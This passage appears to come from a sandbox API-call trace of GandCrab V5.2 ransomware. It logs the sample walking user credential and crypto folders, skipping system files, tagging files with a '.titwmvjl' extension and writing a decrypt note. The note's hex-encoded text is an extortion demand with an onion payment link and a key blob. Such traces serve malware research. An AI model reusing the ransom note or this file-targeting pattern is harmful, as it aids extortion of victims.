4\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.792] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0071.793] CloseHandle (hObject=0x2bc) returned 1 [0071.793] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.794] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.794] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x6b)) [0071.794] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.794] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.794] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.795] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock") returned 84 [0071.795] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\credentials\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0071.795] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.795] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.795] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 60 [0071.795] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0071.795] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503478 [0071.796] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.796] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.796] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.796] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.796] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0071.796] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0071.796] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock" [0071.796] lstrlenW (lpString=".titwmvjl") returned 9 [0071.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock") returned 84 [0071.796] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.796] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 93 [0071.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a09d2ca4deb61a.lock") returned 84 [0071.796] lstrlenW (lpString=".lock") returned 5 [0071.796] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.796] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0071.796] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.797] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.797] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.797] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.797] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.797] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt" [0071.797] lstrlenW (lpString=".titwmvjl") returned 9 [0071.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt") returned 80 [0071.797] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.797] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 89 [0071.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt") returned 80 [0071.797] lstrlenW (lpString=".txt") returned 4 [0071.797] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.797] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.797] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.797] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt") returned 80 [0071.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\TITWMVJL-DECRYPT.txt") returned 80 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.798] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.798] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.798] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0071.798] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0071.798] CloseHandle (hObject=0x2bc) returned 1 [0071.798] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0071.798] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0071.799] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0071.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto" [0071.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\" [0071.799] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.799] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.799] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.800] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.800] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.800] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.800] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.800] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\\\TITWMVJL-DECRYPT.txt") returned 76 [0071.801] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0071.801] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a